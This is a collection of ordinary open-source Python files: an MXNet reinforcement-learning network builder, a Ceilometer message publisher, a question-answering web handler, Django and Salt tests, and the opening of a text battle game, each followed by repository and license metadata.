network_is_local, network_is_trainable)
def construct_model(self):
# validate the configuration
if len(self.network_parameters.input_embedders_parameters) == 0:
raise ValueError("At least one input type should be defined")
if len(self.network_parameters.heads_parameters) == 0:
raise ValueError("At least one output type should be defined")
if self.network_parameters.middleware_parameters is None:
raise ValueError("Exactly one middleware type should be defined")
self.model = GeneralModel(
num_networks=self.num_networks,
num_heads_per_network=self.num_heads_per_network,
network_is_local=self.network_is_local,
network_name=self.network_wrapper_name,
agent_parameters=self.ap,
network_parameters=self.network_parameters,
spaces=self.spaces)
self.losses = self.model.losses()
# Learning rate
lr_scheduler = None
if self.network_parameters.learning_rate_decay_rate != 0:
lr_scheduler = mx.lr_scheduler.FactorScheduler(
step=self.network_parameters.learning_rate_decay_steps,
factor=self.network_parameters.learning_rate_decay_rate)
# Optimizer
# FIXME Does this code for distributed training make sense?
if self.distributed_training and self.network_is_local and self.network_parameters.shared_optimizer:
# distributed training + is a local network + optimizer shared -> take the global optimizer
self.optimizer = self.global_network.optimizer
elif (self.distributed_training and self.network_is_local and not self.network_parameters.shared_optimizer)\
or self.network_parameters.shared_optimizer or not self.distributed_training:
if self.network_parameters.optimizer_type == 'Adam':
self.optimizer = mx.optimizer.Adam(
learning_rate=self.network_parameters.learning_rate,
beta1=self.network_parameters.adam_optimizer_beta1,
beta2=self.network_parameters.adam_optimizer_beta2,
epsilon=self.network_parameters.optimizer_epsilon,
lr_scheduler=lr_scheduler)
elif self.network_parameters.optimizer_type == 'RMSProp':
self.optimizer = mx.optimizer.RMSProp(
learning_rate=self.network_parameters.learning_rate,
gamma1=self.network_parameters.rms_prop_optimizer_decay,
epsilon=self.network_parameters.optimizer_epsilon,
lr_scheduler=lr_scheduler)
elif self.network_parameters.optimizer_type == 'LBFGS':
raise NotImplementedError('LBFGS optimizer not implemented')
else:
raise Exception("{} is not a valid optimizer type".format(self.network_parameters.optimizer_type))
@property
def output_heads(self):
return self.model.output_heads
def _get_activation(activation_function_string: str):
"""
Map the activation function from a string to the mxnet framework equivalent
:param activation_function_string: the type of the activation function
:return: mxnet activation function string
"""
return utils.get_mxnet_activation_name(activation_function_string)
def _sanitize_activation(params: Union[InputEmbedderParameters, MiddlewareParameters, HeadParameters]) ->\
Union[InputEmbedderParameters, MiddlewareParameters, HeadParameters]:
"""
Change activation function to the mxnet specific value
:param params: any parameter that has activation_function property
:return: copy of params with activation function correctly set
"""
params_copy = copy.copy(params)
params_copy.activation_function = _get_activation(params.activation_function)
return params_copy
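# Editorial note: copy.copy above is shallow, so the returned parameters share
# any nested objects (e.g. dense_layer) with the original; only the
# activation_function attribute is rebound on the copy.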
def _get_input_embedder(spaces: SpacesDefinition,
input_name: str,
embedder_params: InputEmbedderParameters) -> ModuleType:
"""
Given an input embedder parameters class, creates the input embedder and returns it
:param input_name: the name of the input to the embedder (used for retrieving the shape). The input should
be a value within the state or the action.
:param embedder_params: the parameters of the class of the embedder
:return: the embedder instance
"""
allowed_inputs = copy.copy(spaces.state.sub_spaces)
allowed_inputs["action"] = copy.copy(spaces.action)
allowed_inputs["goal"] = copy.copy(spaces.goal)
if input_name not in allowed_inputs.keys():
raise ValueError("The key for the input embedder ({}) must match one of the following keys: {}"
.format(input_name, allowed_inputs.keys()))
type = "vector"
if isinstance(allowed_inputs[input_name], TensorObservationSpace):
type = "tensor"
elif isinstance(allowed_inputs[input_name], PlanarMapsObservationSpace):
type = "image"
def sanitize_params(params: InputEmbedderParameters):
params_copy = _sanitize_activation(params)
# params_copy.input_rescaling = params_copy.input_rescaling[type]
# params_copy.input_offset = params_copy.input_offset[type]
params_copy.name = input_name
return params_copy
embedder_params = sanitize_params(embedder_params)
if type == 'vector':
module = VectorEmbedder(embedder_params)
elif type == 'image':
module = ImageEmbedder(embedder_params)
elif type == 'tensor':
module = TensorEmbedder(embedder_params)
else:
raise KeyError('Unsupported embedder type: {}'.format(type))
return module
def _get_middleware(middleware_params: MiddlewareParameters) -> ModuleType:
"""
Given a middleware type, creates the middleware and returns it
    :param middleware_params: the parameters of the middleware class
:return: the middleware instance
"""
middleware_params = _sanitize_activation(middleware_params)
if isinstance(middleware_params, FCMiddlewareParameters):
module = FCMiddleware(middleware_params)
elif isinstance(middleware_params, LSTMMiddlewareParameters):
module = LSTMMiddleware(middleware_params)
else:
raise KeyError('Unsupported middleware type: {}'.format(type(middleware_params)))
return module
def _get_output_head(
head_params: HeadParameters,
head_idx: int,
head_type_index: int,
agent_params: AgentParameters,
spaces: SpacesDefinition,
network_name: str,
is_local: bool) -> Head:
"""
Given a head type, creates the head and returns it
:param head_params: the parameters of the head to create
:param head_idx: the head index
:param head_type_index: the head type index (same index if head_param.num_output_head_copies>0)
:param agent_params: agent parameters
:param spaces: state and action space definitions
:param network_name: name of the network
    :param is_local: whether the head belongs to the local network
:return: head block
"""
head_params = _sanitize_activation(head_params)
if isinstance(head_params, PPOHeadParameters):
module = PPOHead(
agent_parameters=agent_params,
spaces=spaces,
network_name=network_name,
head_type_idx=head_type_index,
loss_weight=head_params.loss_weight,
is_local=is_local,
activation_function=head_params.activation_function,
dense_layer=head_params.dense_layer)
elif isinstance(head_params, VHeadParameters):
module = VHead(
agent_parameters=agent_params,
spaces=spaces,
network_name=network_name,
head_type_idx=head_type_index,
loss_weight=head_params.loss_weight,
is_local=is_local,
activation_function=head_params.activation_function,
dense_layer=head_params.dense_layer)
elif isinstance(head_params, PPOVHeadParameters):
module = PPOVHead(
agent_parameters=agent_params,
spaces=spaces,
network_name=network_name,
head_type_idx=head_type_index,
loss_weight=head_params.loss_weight,
is_local=is_local,
activation_function=head_params.activation_function,
dense_layer=head_params.dense_layer)
elif isinstance(head_params, QHeadParameters):
module = QHead(
agent_parameters=agent_params,
spaces=spaces,
network_name=network_name,
head_type_idx=head_type_index,
loss_weight=head_params.loss_weight,
is_local=is_local,
activation_function=head_params.activation_function,
dense_layer=head_params.dense_layer)
else:
raise KeyError('Unsupported head type: {}'.format(type(head_params)))
return module
class ScaledGradHead(HybridBlock, utils.OnnxHandlerBlock):
"""
Wrapper block for applying gradient scaling to input before feeding the head network
"""
def __init__(self,
head_index: int,
head_type_index: int,
network_name: str,
spaces: SpacesDefinition,
network_is_local: bool,
agent_params: AgentParameters,
head_params: HeadParameters) -> None:
"""
:param head_index: the head index
:param head_type_index: the head type index (same index if head_param.num_output_head_copies>0)
:param network_name: name of the network
:param spaces: state and action space definitions
:param network_is_local: whether network is local
:param agent_params: agent parameters
:param head_params: head parameters
"""
super(ScaledGradHead, self).__init__()
utils.OnnxHandlerBlock.__init__(self)
head_params = _sanitize_activation(head_params)
with self.name_scope():
self.head = _get_output_head(
head_params=head_params,
head_idx=head_index,
head_type_index=head_type_index,
agent_params=agent_params,
spaces=spaces,
network_name=network_name,
is_local=network_is_local)
self.gradient_rescaler = self.params.get_constant(
name='gradient_rescaler',
value=np.array([float(head_params.rescale_gradient_from_head_by_factor)]))
# self.gradient_rescaler = self.params.get(
# name='gradient_rescaler',
# shape=(1,),
# init=mx.init.Constant(float(head_params.rescale_gradient_from_head_by_factor)))
def hybrid_forward(self,
F: ModuleType,
x: Union[NDArray, Symbol],
gradient_rescaler: Union[NDArray, Symbol]) -> Tuple[Union[NDArray, Symbol], ...]:
""" Overrides gluon.HybridBlock.hybrid_forward
:param nd or sym F: ndarray or symbol module
:param x: head input
:param gradient_rescaler: gradient rescaler for partial blocking of gradient
:return: head output
"""
if self._onnx:
# ONNX doesn't support BlockGrad() operator, but it's not typically needed for
# ONNX because mostly forward calls are performed using ONNX exported network.
grad_scaled_x = x
else:
grad_scaled_x = (F.broadcast_mul((1 - gradient_rescaler), F.BlockGrad(x)) +
F.broadcast_mul(gradient_rescaler, x))
out = self.head(grad_scaled_x)
return out
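# Editorial sketch (not part of the original module): hybrid_forward above uses
# F.BlockGrad to pass values forward unchanged while letting only a fraction of
# the gradient flow back. A minimal standalone demonstration of the same trick:
def _demo_gradient_rescaling():
    from mxnet import autograd, nd
    x = nd.array([1.0, 2.0, 3.0])
    x.attach_grad()
    g = nd.array([0.5])  # let half of the gradient through
    with autograd.record():
        y = nd.broadcast_mul(1 - g, nd.BlockGrad(x)) + nd.broadcast_mul(g, x)
        loss = y.sum()
    loss.backward()
    return x.grad  # forward value equals x; x.grad is [0.5, 0.5, 0.5]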
class SingleModel(HybridBlock):
"""
Block that connects a single embedder, with middleware and one to multiple heads
"""
def __init__(self,
network_is_local: bool,
network_name: str,
agent_parameters: AgentParameters,
in_emb_param_dict: {str: InputEmbedderParameters},
embedding_merger_type: EmbeddingMergerType,
middleware_param: MiddlewareParameters,
head_param_list: [HeadParameters],
head_type_idx_start: int,
spaces: SpacesDefinition,
*args, **kwargs):
"""
:param network_is_local: True if network is local
:param network_name: name of the network
:param agent_parameters: agent parameters
:param in_emb_param_dict: dictionary of embedder name to embedding parameters
:param embedding_merger_type: type of merging output of embedders: concatenate or sum
:param middleware_param: middleware parameters
:param head_param_list: list of head parameters, one per head type
:param head_type_idx_start: start index for head type index counting
:param spaces: state and action space definition
"""
super(SingleModel, self).__init__(*args, **kwargs)
self._embedding_merger_type = embedding_merger_type
self._input_embedders = list() # type: List[HybridBlock]
self._output_heads = list() # type: List[ScaledGradHead]
with self.name_scope():
for input_name in sorted(in_emb_param_dict):
input_type = in_emb_param_dict[input_name]
input_embedder = _get_input_embedder(spaces, input_name, input_type)
self.register_child(input_embedder)
self._input_embedders.append(input_embedder)
self.middleware = _get_middleware(middleware_param)
for i, head_param in enumerate(head_param_list):
for head_copy_idx in range(head_param.num_output_head_copies):
# create output head and add it to the output heads list
output_head = ScaledGradHead(
head_index=(head_type_idx_start + i) * head_param.num_output_head_copies + head_copy_idx,
head_type_index=head_type_idx_start + i,
network_name=network_name,
spaces=spaces,
network_is_local=network_is_local,
agent_params=agent_parameters,
head_params=head_param)
self.register_child(output_head)
self._output_heads.append(output_head)
def hybrid_forward(self, F, *inputs: Union[NDArray, Symbol]) -> Tuple[Union[NDArray, Symbol], ...]:
""" Overrides gluon.HybridBlock.hybrid_forward
:param nd or sym F: ndarray or symbol block
:param inputs: model inputs, one for each embedder
:return: head outputs in a tuple
"""
# Input Embeddings
state_embedding = list()
        for model_input, embedder in zip(inputs, self._input_embedders):
            state_embedding.append(embedder(model_input))
# Merger
if len(state_embedding) == 1:
state_embedding = state_embedding[0]
else:
if self._embedding_merger_type == EmbeddingMergerType.Concat:
state_embedding = F.concat(*state_embedding, dim=1, name='merger') # NC or NCHW layout
elif self._embedding_merger_type == EmbeddingMergerType.Sum:
state_embedding = F.add_n(*state_embedding, name='merger')
# Middleware
state_embedding = self.middleware(state_embedding)
# Head
outputs = tuple()
for head in self._output_heads:
out = head(state_embedding)
if not isinstance(out, tuple):
out = (out,)
outputs += out
return outputs
@property
def input_embedders(self) -> List[HybridBlock]:
"""
:return: list of input embedders
"""
return self._input_embedders
@property
def output_heads(self) -> List[Head]:
"""
:return: list of output heads
"""
return [h.head for h in self._output_heads]
class GeneralModel(HybridBlock):
"""
Block that creates multiple single models
"""
def __init__(self,
num_networks: int,
num_heads_per_network: int,
network_is_local: bool,
network_name: str,
agent_parameters: AgentParameters,
network_parameters: NetworkParameters,
spaces: SpacesDefinition,
*args, **kwargs):
"""
:param num_networks: number of networks to create
:param num_heads_per_network: number of heads per network to create
:param network_is_local: True if network is local
:param network_name: name of the network
:param agent_parameters: agent parameters
:param network_parameters: network parameters
:param spaces: state and action space definitions
"""
super(GeneralModel, self).__init__(*args, **kwargs)
with self.name_scope():
self.nets = list()
for network_idx in range(num_networks):
head_type_idx_start = network_idx * num_heads_per_network
head_type_idx_end = head_type_idx_start + num_heads_per_network
net = SingleModel(
head_type_idx_start=head_type_idx_start,
network_name=network_name,
network_is_local=network_is_local,
agent_parameters=agent_parameters,
in_emb_param_dict=network_parameters.input_embedders_parameters,
embedding_merger_type=network_parameters.embedding_merger_type,
middleware_param=network_parameters.middleware_parameters,
head_param_list=network_parameters.heads_parameters[head_type_idx_start:head_type_idx_end],
spaces=spaces)
self.register_child(net)
self.nets.append(net)
def hybrid_forward(self, F, *inputs):
""" Overrides gluon.HybridBlock.hybrid_forward
:param nd or sym F: ndarray or symbol block
:param inputs: model inputs, one for each embedder. Passed to all networks.
:return: head outputs in a tuple
"""
outputs = tuple()
for net in self.nets:
out = net(*inputs)
outputs += out
return outputs
@property
def output_heads(self) -> List[Head]:
""" Return all heads in a single list
Note: There is a one-to-one mapping between output_heads and losses
:return: list of heads
"""
return list(chain.from_iterable(net.output_heads for net in self.nets))
def losses(self) -> List[HeadLoss]:
""" Construct loss blocks for network training
Note: There is a one-to-one mapping between output_heads and losses
:return: list of loss blocks
"""
return [h.loss() for net in self.nets for h in net.output_heads]
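# Editorial note: chain.from_iterable in output_heads above flattens one level
# of nesting, e.g. list(chain.from_iterable([[1, 2], [3]])) == [1, 2, 3].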
|
NervanaSystems/coach
|
rl_coach/architectures/mxnet_components/general_network.py
|
Python
|
apache-2.0
| 24,307
|
#
# Copyright 2012 New Dream Network, LLC (DreamHost)
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Publish a sample using the preferred RPC mechanism.
"""
import abc
import itertools
import operator
from oslo_config import cfg
from oslo_log import log
import oslo_messaging
from oslo_utils import encodeutils
from oslo_utils import excutils
import six
import six.moves.urllib.parse as urlparse
from ceilometer.i18n import _, _LE, _LI
from ceilometer import messaging
from ceilometer import publisher
from ceilometer.publisher import utils
LOG = log.getLogger(__name__)
NOTIFIER_OPTS = [
cfg.StrOpt('metering_topic',
default='metering',
help='The topic that ceilometer uses for metering '
'notifications.',
),
cfg.StrOpt('event_topic',
default='event',
help='The topic that ceilometer uses for event '
'notifications.',
),
cfg.StrOpt('telemetry_driver',
default='messagingv2',
help='The driver that ceilometer uses for metering '
'notifications.',
deprecated_name='metering_driver',
)
]
cfg.CONF.register_opts(NOTIFIER_OPTS,
group="publisher_notifier")
cfg.CONF.import_opt('host', 'ceilometer.service')
class DeliveryFailure(Exception):
def __init__(self, message=None, cause=None):
super(DeliveryFailure, self).__init__(message)
self.cause = cause
def raise_delivery_failure(exc):
excutils.raise_with_cause(DeliveryFailure,
encodeutils.exception_to_unicode(exc),
cause=exc)
@six.add_metaclass(abc.ABCMeta)
class MessagingPublisher(publisher.PublisherBase):
def __init__(self, parsed_url):
options = urlparse.parse_qs(parsed_url.query)
# the value of options is a list of url param values
# only take care of the latest one if the option
# is provided more than once
self.per_meter_topic = bool(int(
options.get('per_meter_topic', [0])[-1]))
self.policy = options.get('policy', ['default'])[-1]
self.max_queue_length = int(options.get(
'max_queue_length', [1024])[-1])
self.max_retry = 0
self.local_queue = []
if self.policy in ['default', 'queue', 'drop']:
LOG.info(_LI('Publishing policy set to %s'), self.policy)
else:
            LOG.warning(_('Publishing policy is unknown (%s), forcing to '
                          'default'), self.policy)
self.policy = 'default'
self.retry = 1 if self.policy in ['queue', 'drop'] else None
def publish_samples(self, samples):
"""Publish samples on RPC.
:param samples: Samples from pipeline after transformation.
"""
meters = [
utils.meter_message_from_counter(
sample, cfg.CONF.publisher.telemetry_secret)
for sample in samples
]
topic = cfg.CONF.publisher_notifier.metering_topic
self.local_queue.append((topic, meters))
if self.per_meter_topic:
for meter_name, meter_list in itertools.groupby(
sorted(meters, key=operator.itemgetter('counter_name')),
operator.itemgetter('counter_name')):
meter_list = list(meter_list)
topic_name = topic + '.' + meter_name
LOG.debug('Publishing %(m)d samples on %(n)s',
{'m': len(meter_list), 'n': topic_name})
self.local_queue.append((topic_name, meter_list))
self.flush()
def flush(self):
# NOTE(sileht):
# this is why the self.local_queue is emptied before processing the
# queue and the remaining messages in the queue are added to
# self.local_queue after in case of another call having already added
# something in the self.local_queue
queue = self.local_queue
self.local_queue = []
self.local_queue = (self._process_queue(queue, self.policy) +
self.local_queue)
if self.policy == 'queue':
self._check_queue_length()
def _check_queue_length(self):
queue_length = len(self.local_queue)
if queue_length > self.max_queue_length > 0:
count = queue_length - self.max_queue_length
self.local_queue = self.local_queue[count:]
LOG.warning(_("Publisher max local_queue length is exceeded, "
"dropping %d oldest samples") % count)
def _process_queue(self, queue, policy):
current_retry = 0
while queue:
topic, data = queue[0]
try:
self._send(topic, data)
except DeliveryFailure:
data = sum([len(m) for __, m in queue])
if policy == 'queue':
LOG.warning(_("Failed to publish %d datapoints, queue "
"them"), data)
return queue
elif policy == 'drop':
LOG.warning(_("Failed to publish %d datapoints, "
"dropping them"), data)
return []
current_retry += 1
if current_retry >= self.max_retry:
LOG.exception(_LE("Failed to retry to send sample data "
"with max_retry times"))
raise
else:
queue.pop(0)
return []
def publish_events(self, events):
"""Send an event message for publishing
:param events: events from pipeline after transformation
"""
ev_list = [utils.message_from_event(
event, cfg.CONF.publisher.telemetry_secret) for event in events]
topic = cfg.CONF.publisher_notifier.event_topic
self.local_queue.append((topic, ev_list))
self.flush()
@abc.abstractmethod
def _send(self, topic, meters):
"""Send the meters to the messaging topic."""
class NotifierPublisher(MessagingPublisher):
def __init__(self, parsed_url, default_topic):
super(NotifierPublisher, self).__init__(parsed_url)
options = urlparse.parse_qs(parsed_url.query)
topic = options.pop('topic', [default_topic])
driver = options.pop('driver', ['rabbit'])[0]
url = None
if parsed_url.netloc != '':
url = urlparse.urlunsplit([driver, parsed_url.netloc,
parsed_url.path,
urlparse.urlencode(options, True),
parsed_url.fragment])
self.notifier = oslo_messaging.Notifier(
messaging.get_transport(cfg.CONF, url),
driver=cfg.CONF.publisher_notifier.telemetry_driver,
publisher_id='telemetry.publisher.%s' % cfg.CONF.host,
topics=topic,
retry=self.retry
)
def _send(self, event_type, data):
try:
self.notifier.sample({}, event_type=event_type,
payload=data)
except oslo_messaging.MessageDeliveryFailure as e:
raise_delivery_failure(e)
class SampleNotifierPublisher(NotifierPublisher):
def __init__(self, parsed_url):
super(SampleNotifierPublisher, self).__init__(
parsed_url, cfg.CONF.publisher_notifier.metering_topic)
class EventNotifierPublisher(NotifierPublisher):
def __init__(self, parsed_url):
super(EventNotifierPublisher, self).__init__(
parsed_url, cfg.CONF.publisher_notifier.event_topic)
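# Editorial sketch (hypothetical class, not part of the original module) of the
# drain-and-requeue pattern in MessagingPublisher.flush(): the shared queue is
# swapped out before processing so that samples enqueued concurrently by
# another call are preserved, and unsent items are put back at the front.
class _TinyPublisher(object):
    def __init__(self):
        self.local_queue = []

    def _process_queue(self, queue):
        # pretend everything after the first item failed and must be requeued
        return queue[1:]

    def flush(self):
        queue = self.local_queue
        self.local_queue = []
        self.local_queue = self._process_queue(queue) + self.local_queue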
|
ityaptin/ceilometer
|
ceilometer/publisher/messaging.py
|
Python
|
apache-2.0
| 8,270
|
# -*- coding: utf-8 -*-
# Copyright 2017 Janko Hoener
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from google.appengine.api import memcache, urlfetch, urlfetch_errors
import logging
from handlerlib import *
from datatypes import *
from userauth import *
import urllib, urllib2
from urllib2 import Request
import os
from google.appengine.api.urlfetch_errors import *
class AskNowJSONAnswerHandler(Handler):
GENESIS_API_URL = 'http://genesis.aksw.org/api/'
GENESIS_APIS = ['description', 'similar', 'related', 'images', 'videos']
GENESIS_QUERY_APIS = ['images', 'videos']
GENESIS_API_JSON_MAPPING = {'related': 'relatedEntities', 'similar': 'similarEntities'}
DBPEDIASL_URL = 'http://model.dbpedia-spotlight.org/en/annotate'
DBPEDIA_URL = 'http://dbpedia.org/resource/'
DBPEDIA_API_URL = 'http://dbpedia.org/sparql'
DBPEDIASL_CONF = 0.4
def retrieve_info(self, titles):
resp = {}
resp['information'] = []
resp['answers'] = []
        for title in list(titles):  # iterate over a copy; titles is mutated below
title_type = type(title)
if title_type is int or title_type is float:
resp['answers'].append("{:,}".format(title))
titles.remove(title)
continue
elif title_type is bool:
resp['answers'].append(('Yes', 'No')[title])
titles.remove(title)
continue
elif title_type is not str:
raise ValueError('title must be string, int, float or boolean')
# elif title_type is str:
cur_info = {}
cur_info['title'] = title
for api in self.GENESIS_APIS:
dbpurl = {}
if api in self.GENESIS_QUERY_APIS:
dbpurl['q'] = title
else:
dbpurl['url'] = self.DBPEDIA_URL + self.encode_title(title)
dbpjson = json.dumps(dbpurl)
url = self.GENESIS_API_URL + api
retry = 2
while retry:
try:
urlobj = urlfetch.fetch(url, method='POST', payload=dbpjson, headers={'Accept': 'application/json', 'Content-Type': 'application/json', 'Connection': 'keep-alive'}, deadline=1)
except:
retry = retry - 1
if not retry:
if api in self.GENESIS_API_JSON_MAPPING:
cur_info[self.GENESIS_API_JSON_MAPPING[api]] = None
else:
cur_info[api] = None
break
else:
if urlobj.status_code == 200:
cur_info.update(json.loads(urlobj.content))
break
else:
retry = retry - 1
if not retry:
if api in self.GENESIS_API_JSON_MAPPING:
                                    cur_info[self.GENESIS_API_JSON_MAPPING[api]] = None
                                else:
                                    cur_info[api] = None
break
resp['information'].append(cur_info)
resp['answers'].extend(titles)
resp['lenanswers'] = len(resp['answers'])
resp['status'] = 0
resp['message'] = 'Connection successful.'
return resp
def retrieve_entities(self, phrase):
param = {}
param['text'] = phrase
param['confidence'] = self.DBPEDIASL_CONF
params = 'text=%s&confidence=%s' % (param['text'], param['confidence'])
url = self.DBPEDIASL_URL + '?' + urllib.urlencode(param)
logging.info('Retrieving entities for %s from %s' % (phrase, url))
headers = { 'Accept' : 'application/json' }
retry = 2
while retry:
try:
a = urlfetch.fetch(url, headers = headers)
except:
retry = retry - 1
if not retry:
return []
else:
if a.status_code == 200:
entityobj = json.loads(a.content)
logging.debug(entityobj)
if entityobj.get('Resources'):
titles = []
for entity in entityobj['Resources']:
if entity.get('@URI'):
title = self.retrieve_title_from_url(entity['@URI']).encode('utf-8')
titles.append(title)
if titles:
logging.info('Successfully retrieved entities for %s' % phrase)
return titles
else:
return []
else:
return []
else:
return []
def retrieve_titles(self, question):
# FIXME: this should use a call to an AskNow API
known_answers = {
'how many symphonies did beethoven compose': [9],
'how many inhabitants does oberhausen have': [210934],
'is albert einstein alive': [True],
'is kanye west alive': [False],
'who is the president of the united states': ['Barack Obama'],
'how many goals did gerd müller score': ['Gerd Müller'],
'who is the president elect of the united states': ['Donald Trump'],
'in which city was beethoven born': ['Bonn'],
'in which city was adenauer born': ['Cologne'],
'what country is shah rukh khan from': ['India'],
'what are the capitals of germany and india': ['Berlin', 'New Delhi'],
'what are the capitals of germany, india and usa': ['Berlin', 'New Delhi', 'Washington D.C.'],
'what are the capitals of germany, india, usa and france': ['Berlin', 'New Delhi', 'Washington D.C.', 'Paris']
}
if question in known_answers:
return known_answers[question]
else:
return []
def get(self):
query = question = self.request.get('q')
logging.info('Generating JSON for query %s' % query)
question = question.lower().replace('?', '')
question = question.encode('utf-8')
answers = {}
if query:
logging.info('Retrieving titles for question %s' % question)
titles = self.retrieve_titles(question)
logging.info('Retrieved %s titles.' % len(titles))
if len(titles) > 0:
logging.info('Question answered by AskNow, retrieving info for titles.')
answers = self.retrieve_info(titles)
answers['answered'] = True
if len(answers['information']) == 0 and answers.get('lenanswers') > 0:
                    logging.info('Question answered, but no information on entities available. ' +
                                 'Loading info for entities of question.')
entitytitles = self.retrieve_entities(question)
entityanswers = self.retrieve_info(entitytitles)
answers['information'].extend(entityanswers['information'])
logging.info('Information successfully retrieved.')
else:
                logging.info('Question cannot be answered by AskNow. ' +
                             'Attempting to load entities of the question.')
titles = self.retrieve_entities(question)
answers = self.retrieve_info(titles)
answers['answers'] = []
answers['lenanswers'] = 0
answers['answered'] = False
else:
answers = { 'status': 2, 'message': 'Application needs a q parameter, none given.' }
answers['question'] = query
json_string = json.dumps(answers)
self.response.headers['Content-Type'] = 'application/json; charset=UTF-8'
self.write(json_string)
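# Editorial sketch (hypothetical helper, not part of the original file): the
# two retry loops above share the same shape and could be factored out. This
# assumes only that fetch_fn raises on failure and returns an object exposing
# status_code and content.
def _fetch_with_retry(fetch_fn, retries=2):
    while retries:
        try:
            resp = fetch_fn()
        except Exception:
            retries -= 1
        else:
            if resp.status_code == 200:
                return resp
            retries -= 1
    return None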
|
jankohoener/asknow-UI
|
asknow-UI/api.py
|
Python
|
apache-2.0
| 6,797
|
from django.db import models as django_models
from project.models import Project
# Create your models here.
class SupportProject(django_models.Model):
    project = django_models.OneToOneField(Project, on_delete=django_models.PROTECT, related_name="for_support_purposes", unique=True)
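# Editorial note: OneToOneField already enforces a unique constraint, so the
# explicit unique=True above is redundant (Django flags this with a
# fields.W342 system-check warning).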
|
postpdm/ich_bau
|
support/models.py
|
Python
|
apache-2.0
| 294
|
from fabric.api import *
from fabric.context_managers import *
from fabric.contrib.console import confirm
import os, subprocess, sys, json
lib_path = os.path.abspath(os.path.join('./util'))
sys.path.append(lib_path)
from md_utils import *
local_dir = os.getcwd()
@task
def unittest():
local("python test/md_utils_test.py")
|
walterfan/snippets
|
python/fabfile.py
|
Python
|
apache-2.0
| 337
|
import sys
import pytest
import salt.utils.data
def test_get_value_simple_path():
data = {"a": {"b": {"c": "foo"}}}
assert [{"value": "foo"}] == salt.utils.data.get_value(data, "a:b:c")
@pytest.mark.skipif(
sys.version_info < (3, 6),
reason="Test will randomly fail since Python3.5 does not have ordered dictionaries",
)
def test_get_value_placeholder_dict():
data = {"a": {"b": {"name": "foo"}, "c": {"name": "bar"}}}
assert [
{"value": "foo", "id": "b"},
{"value": "bar", "id": "c"},
] == salt.utils.data.get_value(data, "a:{id}:name")
@pytest.mark.skipif(
sys.version_info < (3, 6),
reason="Test will randomly fail since Python3.5 does not have ordered dictionaries",
)
def test_get_value_placeholder_list():
data = {"a": [{"name": "foo"}, {"name": "bar"}]}
assert [
{"value": "foo", "id": 0},
{"value": "bar", "id": 1},
] == salt.utils.data.get_value(data, "a:{id}:name")
@pytest.mark.skipif(
sys.version_info < (3, 6),
reason="Test will randomly fail since Python3.5 does not have ordered dictionaries",
)
def test_get_value_nested_placeholder():
data = {
"a": {
"b": {"b1": {"name": "foo1"}, "b2": {"name": "foo2"}},
"c": {"c1": {"name": "bar"}},
}
}
assert [
{"value": "foo1", "id": "b", "sub": "b1"},
{"value": "foo2", "id": "b", "sub": "b2"},
{"value": "bar", "id": "c", "sub": "c1"},
] == salt.utils.data.get_value(data, "a:{id}:{sub}:name")
def test_get_value_nested_notfound():
data = {"a": {"b": {"c": "foo"}}}
assert [{"value": []}] == salt.utils.data.get_value(data, "a:b:d", [])
def test_get_value_not_found():
assert [{"value": []}] == salt.utils.data.get_value({}, "a", [])
def test_get_value_none():
assert [{"value": None}] == salt.utils.data.get_value({"a": None}, "a")
def test_get_value_simple_type_path():
assert [{"value": []}] == salt.utils.data.get_value({"a": 1024}, "a:b", [])
def test_get_value_None_path():
assert [{"value": None}] == salt.utils.data.get_value({"a": None}, "a:b", [])
def test_flatten_recursion_error():
"""
Test the flatten function for reference cycle detection
"""
data = [1, 2, 3, [4]]
data.append(data)
with pytest.raises(RecursionError) as err:
salt.utils.data.flatten(data)
assert str(err.value) == "Reference cycle detected. Check input list."
|
saltstack/salt
|
tests/pytests/unit/utils/test_data.py
|
Python
|
apache-2.0
| 2,449
|
import pytest
import mock
from mock import call
import pendulum
from django.utils import timezone
from fit4school.core.models import Tracker, Program, School, Student, Classroom
TZ = pendulum.timezone(timezone.get_current_timezone_name())
@pytest.mark.django_db
@mock.patch("fit4school.core.models.notify_tracker_changes")
@mock.patch("fit4school.core.models.timezone.now")
def test_save_notify(time_now, notify):
fake_now = TZ.convert(timezone.datetime(2018, 2, 4, 23, 9, 37, 122))
time_now.return_value = fake_now
# Creates a tracker object and then set the MAC address
# Test that notify is called
program = Program.objects.create(name='program')
school = School.objects.create(name='school', program=program)
classroom = Classroom.objects.create(name='classroom', school=school, teacher='teacher')
student = Student.objects.create(name='student', classroom=classroom)
tracker = Tracker.objects.create(tracker_id=10, program=program)
mac_addr = "ABCD"
# set the mac
tracker.mac = mac_addr
tracker.save()
# add a student
student.add_tracker(tracker.tracker_id)
assert notify.delay.call_args_list == [
call({
'battery_status': (None, 'U'),
'program': (None, program),
'tracker_count': (None, 0),
'_student': '',
'_tracker_id': 10
}),
call({'mac': (None, mac_addr), '_student': '', '_tracker_id': 10}),
call({
'date_assigned': (None, fake_now),
'_student': 'classroom - teacher - school - student',
'_tracker_id': 10
})
]
|
goodes/fit4school
|
fit4school/core/tests/test_save.py
|
Python
|
apache-2.0
| 1,638
|
import sys, time, functions, getpass # imports
from random import randint
from config import *
from player import Player
from enemies import *
from states import States
# runs the game
def runGame():
playerClasses = ['Fighter', 'Thief'] # possible player classes
    enemyClasses = ['HOF','LOF','DEW','DEC','DEA'] # possible enemy classes (not used)
frontRowPossibilities = ['HOF','LOF'] # possible front row enemy classes
backRowPossibilities = ['DEW','DEC','DEA'] # possible back row enemy classes
commandPossibilities = ['Attack','Defend', 'Save', 'Exit'] # player actions
functions.clearScreen()
print 'Welcome to AI Battle!'
print '------------------------------------------'
print 'Load Game?' # load a previous game?
allEnemies = None
thePlayer = None
load = raw_input('(y/n)> ')
if load.lower() in afermativeStrings:
allEnemies,thePlayer = functions.loadGame() # load a saved game
else:
print 'Please pick your player class! (pick number NOT name)'
while True: # used to pick player classes
